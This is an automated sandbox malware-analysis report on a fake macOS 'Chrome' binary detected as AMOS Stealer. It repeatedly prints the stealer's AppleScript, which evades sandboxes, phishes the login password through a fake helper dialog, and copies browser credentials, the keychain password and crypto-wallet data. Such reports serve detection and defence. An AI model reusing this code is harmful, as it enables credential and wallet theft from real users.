Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
Chrome

Overview

General Information

Sample name:Chrome
Analysis ID:1638499
MD5:72676069d026c215aef39c18314a2744
SHA1:8bbd7dc2d8721215b8606b1b0aa2c48254d0d60e
SHA256:11317b3ba43ea9dc46d169c9b053660e184ff93a9e98eddcb349eafde3bc845c
Infos:

Detection

AMOS Stealer
Score:52
Range:0 - 100

Signatures

Detected AMOS Stealer
Executes Apple scripts with very long statement arguments
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Mach-O contains sections with high entropy indicating compressed/encrypted content
Reads file resource fork extended attributes
Reads the systems hostname
Sample is a FAT Mach-O sample containing binaries for multiple architectures
Sample is code signed by an ad-hoc signature
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1638499
Start date and time:2025-03-14 13:09:16 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.14
CPU architecture:x86_64
Analysis Mode:default
Sample name:Chrome
Detection:MAL
Classification:mal52.spyw.evad.mac@0/0@0/0
  • Excluded IPs from analysis (whitelisted): 104.18.38.233, 184.31.49.222, 17.253.7.132, 17.253.7.144, 17.253.7.135, 17.36.200.79, 17.253.7.134, 17.253.7.137, 184.31.52.29
  • Excluded domains from analysis (whitelisted): e11408.d.akamaiedge.net, lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, crl.apple.com, ocsp.comodoca.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, init.itunes.apple.com, mesu.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net
Command:/Users/bernard/Desktop/Chrome
PID:621
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:140:155: execution error: An error of type -1 has occurred. (-1)
  • System is macvm-mojave
  • nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged
  • Chrome (MD5: 72676069d026c215aef39c18314a2744) Arguments: /Users/bernard/Desktop/Chrome
    • sh New Fork (PID: 622, Parent: 621)
    • osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e tell application 'terminal' to set visible of the front window to false
    • sh New Fork (PID: 623, Parent: 621)
    • osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorreturn 'not found'end tryend GetUUIDon firewallets(firepath, savePath)tryset fire_wallets to {{'MetaMask', 'webextension@metamask.io\\\':\\\''}}repeat with wallet in fire_walletsset uuid to GetUUID(firepath & '/prefs.js', item 2 of wallet)if uuid is not 'not found' thenset walkpath to firepath & '/storage/default/'set fileList to list folder walkpath without invisiblesrepeat with currentItem in fileListif (currentItem contains uuid) and (currentItem contains 'userContext') thenset fwallet to walkpath & currentItem & '/idb/'set fileList_wallet to list folder fwallet without invisiblesrepeat with currentItem_wallet in fileList_walletif isDirectory(fwallet & currentItem_wallet) thenGrabFolder(fwallet & currentItem_wallet, savePath & '/' & item 1 of wallet & '/')end ifend repeatend ifend repeatend ifend repeatend tryend firewalletson parseFF(browsername, firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'gecko/' & browsername & '_' & currentItemfirewallets(firefox & currentItem, fpath)set readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper. Please enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'ldinpeekobnhjjdofggfgjlcehhmanlj', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'jbkgjmpfammbgejcpedggoefddacbdia', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'nebnhfamliijlghikdgcigoebonmoibm', 'fdcnegogpncmfejlfnffnofpngdiejii', 'mfhbebgoclkghebffdldpobeajmbecfk', 'ffbceckpkpbcmgiaehlloocglmijnpmp', 'kfdniefadaanbjodldohaedphafoffoh', 'bedogdpgdnifilpgeianmmdabklhfkcn', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'opcgpfmipidbgpenhmajoajpbobppdil', 'mmmjbcfofconkannjonfmjjajpllddbg', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ejjladinnckdgjemekebdpeokbikhfci', 'kkpllkodjeloidieedojogacfhpaihoh', 'apnehcjmnengpnmccpaibjmhhoadaico', 'jiepnaheligkibgcjgjepjfppgbcghmp', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'idpdilbfamoopcfofbipefhmmnflljfi', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ilhaljfiglknggcoegeknjghdgampffk', 'pfccjkejcgoppjnllalolplgogenfojk', 'cnmamaachppnkjgnildpdmkaakejnhae', 'eajafomhmkipbjmfmhebemolkcicgfmd', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'hifafgmccdpekplomjjkcfgodnhcellj', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bcopgchhojmggmffilplmbdicgaihlkp', 'cmoakldedjfnjofgbbfenefcagmedlga', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'ibljocddagjghmlpgihahamcghfggcjc', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'kbdcddcmgoplfockflacnnefaehaiocb', 'cgeeodpfagjceefieflmdfphplkenlfk', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'fdchdcpieegfofnofhgdombfckhbcokj', 'gjlmehlldlphhljhpnlddaodbjjcchai', 'ellkdbaphhldpeajbepobaecooaoafpg', 'ojbcfhjmpigfobfclfflafhblgemeidi', 'ghlmndacnhlaekppcllcpcjjjomjkjpg', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'pdliaogehgdbhbnmkklieghmmjkpigpa', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'jfdlamikmbghhapbgfoogdffldioobgl', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'cflgahhmjlmnjbikhakapcfkpbcmllam', 'keenhcnmdmjjhincpilijphpiohdppno', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'bcenedbpaaegpnijoadpdjiachahncdg', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'cjookpbkjnpkmknedggeecikaponcalb', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'dngmlblcodfobpdpecaadgfbcggfjfnm', 'jnldfbidonfeldmalbflbmlebbipcnle', 'ehjiblpccbknkgimiflboggcffmpphhp', 'agoakfejjabomempkjlepdflaleeobhb', 'fopmedgnkfpebgllppeddmmochcookhc', 'dmkamcknogkgcdfhhbddcghachkejeap', 'iglbgmakmggfkoidiagnhknlndljlolb', 'opfgelmcmbiajamepnmloijbpoleiama', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'gafhhkghbfjjkeiendhlofajokpaflmk', 'imlcamfeniaidioeflifonfjeeppblda', 'penjlddjkjgpnkllboccdgccekpkcbin', 'nhnkbkgjikgcigadomkphalanndcapjk', 'egjidjbpglichdcondbcbdnbeeppgdph', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'dldjpboieedgcmpkchcjcbijingjcgok', 'acmacodkjbdgmoleebolmdjonilkdbch', 'lccbohhgfkdikahanoclbdmaolidjdfl', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'gjagmgiddbbciopjhllkdnddhcglnemk', 'cnncmdhjacpkmjmkcafchppbnpnhdmon', 'mfgccjchihfkkindfppnaooecgfneiii', 'ieldiilncjhfkalnemgjbffmpomcaigi', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'loinekcabhlmhjjbocijdoimmejangoa', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bgpipimickeadkjlklgciifhnalhdjhe', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'aeachknmefphepccionboohckonoeemg', 'gdokollfhmnbfckbobkdbakhilldkhcj', 'jiiigigdinhhgjflhljdkcelcjfmplnd', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'fcckkdbjnoikooededlapcalpionmalo', 'mdnaglckomeedfbogeajfajofmfgpoae', 'ebfidpplhabeedpnhjnobghokpiioolj', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'epapihdplajcdnnkdeiahlgigofloibg', 'iokeahhehimjnekafflcihljlcjccdbe', 'cihmoadaighcejopammfbmddcmdekcje', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'kilnpioakcdndlodeeceffgjdpojajlo', 'abogmiocnneedmmepnohnhlijcjpcifd', 'bofddndhbegljegmpmnlbhcejofmjgbn', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'hdkobeeifhdplocklknbnejdelgagbao', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'lfmmjkfllhmfmkcobchabopkcefjkoip', '
  • eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.195.72:443 -> 192.168.11.12:49348 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.253.7.136:443 -> 192.168.11.12:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49400 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.7.136
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49348
Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49396
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49351
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49395
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
Source: unknownNetwork traffic detected: HTTP traffic on port 49393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49393
Source: unknownNetwork traffic detected: HTTP traffic on port 49395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49392
Source: unknownNetwork traffic detected: HTTP traffic on port 49391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49391
Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.195.72:443 -> 192.168.11.12:49348 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.253.7.136:443 -> 192.168.11.12:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49400 version: TLS 1.2
Source: classification engineClassification label: mal52.spyw.evad.mac@0/0@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 623)Osascript command executed: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorrJump to behavior
Source: /bin/sh (PID: 622)Osascript command executed: osascript -e tell application 'terminal' to set visible of the front window to falseJump to behavior
Source: /bin/sh (PID: 623)Osascript command executed: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorrJump to behavior
Source: /Users/bernard/Desktop/Chrome (PID: 621)Shell command executed: sh -c osascript -e 'tell application 'terminal' to set visible of the front window to false'Jump to behavior
Source: /Users/bernard/Desktop/Chrome (PID: 621)Shell command executed: sh -c osascript -e 'set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon erJump to behavior
